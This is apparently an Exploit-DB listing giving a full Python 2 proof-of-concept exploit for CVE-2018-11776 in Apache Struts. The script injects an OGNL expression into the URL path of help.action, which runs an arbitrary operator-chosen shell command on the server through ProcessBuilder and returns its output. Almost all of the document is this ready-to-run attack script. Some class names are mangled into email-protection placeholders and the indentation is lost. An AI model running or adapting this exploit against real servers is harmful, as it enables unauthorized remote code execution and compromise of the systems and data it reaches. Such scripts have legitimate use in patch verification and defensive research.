Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2)

EDB-ID: 45262
Author: hook-s3c
Published: 2018-08-25
CVE: CVE-2018-11776
Type: Remote
Platform: Multiple
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

 # -*- coding: utf-8 -*- 

# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter

import sys
import urllib
import urllib2
import httplib


def exploit(host,cmd):
print "[Execute]: {}".format(cmd)

ognl_payload = "${"
ognl_payload += "(#_memberAccess['allowStaticMethodAccess']=true)."
ognl_payload += "(#cmd='{}').".format(cmd)
ognl_payload += "(#iswin=(@[email protected]('os.name').toLowerCase().contains('win')))."
ognl_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd}))."
ognl_payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
ognl_payload += "(#p.redirectErrorStream(true))."
ognl_payload += "(#process=#p.start())."
ognl_payload += "(#ros=(@[email protected]().getOutputStream()))."
ognl_payload += "(@[email protected](#process.getInputStream(),#ros))."
ognl_payload += "(#ros.flush())"
ognl_payload += "}"

if not ":" in host:
host = "{}:8080".format(host)

# encode the payload
ognl_payload_encoded = urllib.quote_plus(ognl_payload)

# further encoding
url = "http://{}/{}/help.action".format(host, ognl_payload_encoded.replace("+","%20").replace(" ", "%20").replace("%2F","/"))

print "[Url]: {}\n\n\n".format(url)

try:
request = urllib2.Request(url)
response = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
response = e.partial
print response


if len(sys.argv) < 3:
sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])
else:
exploit(sys.argv[1],sys.argv[2])
#NCt4elp3bDE3c1BlVkRPbnlhSjUzSG51MnU4R1FNRWhZd2RSeWxwaHRuaktyU1BMSDJKOERlT3d0S0gvZ0c4OGN1RG1HZm00dlZIZjZEUWt1N1d0ZEE3anVkVGQ0S1ZHbWpwcW1Ob0graE84TERVQ2gxY2UxR1hzMGh4NkVrT0VTSCtQVWJIRUJaS3NYU0pFYUpQWVg1M2JQcWg0WjBXZU9JTGxDMjNrWS8xQ2VDQUxXeFkxdWlrbnh4cXhLR0szdnFweVYyWTUyVmI2WGVXQVNoTWhEemxjaG1waGZjb2RkT1FvUmluUWtKam1scmltV2xGOWlsVkxhTHh4NGJzanRPcmdTZEMvNkg1VUEreVgrSVJxV0E9PQ==

Related Posts